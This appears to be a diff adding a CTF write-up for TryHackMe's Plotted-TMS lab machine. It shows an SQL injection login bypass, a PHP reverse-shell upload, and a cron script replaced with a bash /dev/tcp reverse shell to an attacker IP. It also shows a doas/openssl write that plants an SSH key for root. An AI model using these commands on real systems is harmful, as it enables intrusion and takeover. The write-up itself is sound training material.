add: writeup-ctf

content/writeup-ctf/writeup-plotted-tms-thm/index.md

@@ -0,0 +1,117 @@
+---
+title: "Writeup - Plotted-TMS (THM)"
+date: 2022-03-31
+slug: "writeup-plotted-tms-thm"
+type: "writeup-ctf"
+--- 
+
+This is a writeup for the [Plotted-TMS](https://tryhackme.com/room/plottedtms) machine from the TryHackMe site.
+
+## Enumeration
+
+First, let's start with a scan of our target with the following command:
+
+
+```bash
+nmap -sV -T4 -Pn 10.10.173.55
+```
+Three TCP ports are discovered:
+
+![](img/image-1.webp)
+
+- 22/tcp : SSH port (OpenSSH 8.2)
+- 80/tcp : HTTP web server (Apache 2.4.41)
+- 445/tcp : HTTP web server (Apache 2.4.41)
+
+## Exploit
+
+I start by listing the directories of the site hosted on port 445:
+
+![](img/image-2.webp)
+
+We find a `management` page that gives us access to an admin login page.
+
+![](img/image-3.webp)
+
+After a few injection tests I finally managed to connect with the following injection:
+
+
+```bash
+Username = ' or 1=1;-- -
+```
+I now have access to the admin panel of the site.
+
+![](img/image-4.webp)
+
+In this panel I find the `Settings` page. This page allows to change the font image of the home page of the site. So I try to send a PHP reverse shell.
+
+![](img/image-5.webp)
+
+Then I access it via the following address:
+
+
+```bash
+http://10.10.173.55:445/management/uploads/
+```
+I now have a reverse shell with the user `www-data`.
+
+![](img/image-6.webp)
+
+After some research I find that the first flag is in the personal folder of the user `plot_admin`, problem I do not have the right to read it. So I will have to find a way to change the user.
+
+![](img/image-7.webp)
+
+After launching [linPeas](https://linpeas.sh) on the machine I find that every minute a script backup.sh is launched by the user `plot_admin`.
+
+![](img/image-8.webp)
+
+I don't have the permissions to change the content of the script, but I have the permissions to change the content of the `/var/www/scripts` folder. So I will be able to replace the current script, by a custom script allowing me to have a reverse shell as `plot_admin`.
+
+To do this I use the following commands:
+
+
+```bash
+mv backup.sh tmp
+touch backup.sh
+echo "bash -c '/bin/bash -i >& /dev/tcp/10.8.3.186/2345 0>&1'" > backup.sh
+chmod +x backup.sh
+```
+![](img/image-9.webp)
+
+I now have a reverse shell with the user `plot_admin` and I can get the first flag.
+
+## Privilege escalation
+
+I start by listing the SUID files with the following command:
+
+
+```bash
+find / -perm -u=s -type f 2>/dev/null
+```
+I found a command not very common: [doas](https://man.openbsd.org/doas). This command is an alternative to the `sudo` command. After some research I find on this [site](https://book.hacktricks.xyz/linux-unix/privilege-escalation#doas) that the config file of this command is at the following address: `/etc/doas.conf`.
+
+![](img/image-10.webp)
+
+I find that my user can execute the `openssl` command with admin rights. So I'm looking on [GTFOBins](https://gtfobins.github.io/gtfobins/openssl/) for exploits related to this command.
+
+I find that it is possible to write in files, so I will be able to add to ssh key in the `authorized_keys` file and then connect via SSH to the root account.
+
+To do this I use the following commands:
+
+
+```bash
+FILE=/root/.ssh/authorized_keys
+echo "ssh-rsa [key] kali@kali" | doas openssl enc -out "$FILE"
+```
+![](img/image-11.webp)
+
+I now have a shell `root` shell and can retrieve the last flag.
+
+## Recommendations
+
+To patch this host I think it would be necessary to perform a number of actions:
+
+- Fix the site code to avoid SQL injections ([OWASP SQL Injection](https://cheatsheetseries.owasp.org/cheatsheets/SQL_Injection_Prevention_Cheat_Sheet.html))
+- Implement code detection in the admin panel image uploads
+- Store CRON scripts in a folder accessible only by the author
+- Do not allow root rights on commands that do not require it